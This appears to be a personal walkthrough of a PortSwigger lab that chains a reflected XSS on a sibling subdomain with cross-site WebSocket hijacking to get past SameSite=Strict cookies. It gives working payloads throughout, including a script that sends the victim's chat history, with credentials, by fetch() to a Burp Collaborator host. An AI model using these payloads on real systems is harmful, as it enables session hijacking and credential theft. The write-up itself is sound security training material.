[This lab](https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-sibling-domain) shows how **WebSocket connections** are not protected by `SameSite` restrictions and how you can **leverage a same-site reflected XSS** on a sibling subdomain (e.g., `cms-...`) to launch a **WebSocket hijack** from a browser that **will include the session cookie**. The attack ultimately leaks the victim's chat history — which includes their credentials — to Burp Collaborator. ##### Step 1: Confirm WebSocket Behavior 1. In Burp’s browser, go to **Live Chat** 2. Send a few messages 3. In **Burp → WebSockets**, locate: ``` GET /chat HTTP/1.1 Upgrade: websocket ``` ✅ Observe: - No CSRF tokens - A `"READY"` message triggers the full chat history to be returned --- ##### Step 2: Confirm CSWSH via SameSite=Strict 1. Create PoC script on **Exploit Server**: ```html <script> var ws = new WebSocket("wss://YOUR-LAB-ID.web-security-academy.net/chat"); ws.onopen = function() { ws.send("READY"); }; ws.onmessage = function(e) { fetch("https://YOUR-COLLABORATOR-PAYLOAD.oastify.com", { method: "POST", mode: "no-cors", body: e.data }); }; </script> ``` 2. Store + View Exploit 3. In **Burp → Collaborator**, click **Poll now** ✅ You get **HTTP interaction** ❌ But this is from your exploit’s session → **victim session cookie is not included** due to `SameSite=Strict` --- ##### Step 3: Discover Sibling Domain and Reflected XSS 1. In Burp Proxy, note that resources like `/resources/js/xyz.js` include: ``` Access-Control-Allow-Origin: cms-YOUR-LAB-ID.web-security-academy.net ``` ![[CleanShot 2025-04-23 at 20.38.35.png]] 2. Visit: ``` https://cms-YOUR-LAB-ID.web-security-academy.net ``` ✅ A login form is present ![[CleanShot 2025-04-23 at 20.39.49.png]] 3. Submit: ``` username: <script>alert(1)</script> password: anything ``` ✅ XSS triggered in response → **reflected XSS on sibling domain** 4. Send XSS request to **Burp Repeater** - Change method to `GET` - Copy and test the URL in browser → XSS still triggers ✅ It will be like: ```js /login?username=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&password=xxx ``` --- #### Step 4: Inject CSWSH via Reflected XSS 1. URL-encode the full CSWSH payload: ```javascript <script> var ws = new WebSocket("wss://YOUR-LAB-ID.web-security-academy.net/chat"); ws.onopen = function() { ws.send("READY"); }; ws.onmessage = function(e) { fetch("https://YOUR-COLLABORATOR-PAYLOAD.oastify.com", { method: "POST", mode: "no-cors", body: e.data }); }; </script> ``` ➡ Encoded payload (example, partial): ``` %3Cscript%3Evar%20ws%20%3D%20new%20WebSocket%28%22wss%3A%2F%2FYOUR-LAB-ID.web-security-academy.net%2Fchat%22%29%3B... ``` 2. Create exploit on Exploit Server: ```html <script> location = "https://cms-YOUR-LAB-ID.web-security-academy.net/login?username=PASTE-ENCODED-CSWSH-HERE&password=anything"; </script> ``` 3. **Store and View Exploit** ✅ This causes: - Victim loads your exploit (external site) - Their browser navigates to **same-site sibling subdomain** - XSS fires, runs **WebSocket hijack** - Session cookie **is included** → `SameSite=Strict` **bypass achieved** --- ##### Step 5: Exfiltrate and Extract Victim Credentials 1. In **Burp → Collaborator**, click **Poll now** ✅ You see new **HTTP interactions** 2. Inside the body of these requests, find: ![[CleanShot 2025-04-23 at 20.50.00.png]] --- ##### Step 6: Log In and Solve the Lab 1. Go to the main lab domain 2. Log in ✅ Lab Solved --- ##### Summary |Exploit Chain|Description| |---|---| |Target vulnerability|CSWSH (WebSocket hijack)| |Defense bypassed|`SameSite=Strict` cookies| |Bypass method|Reflected XSS on sibling domain (same-site)| |Key vector|WebSocket opened after redirect with included cookie| |Exfil method|`fetch()` to Burp Collaborator|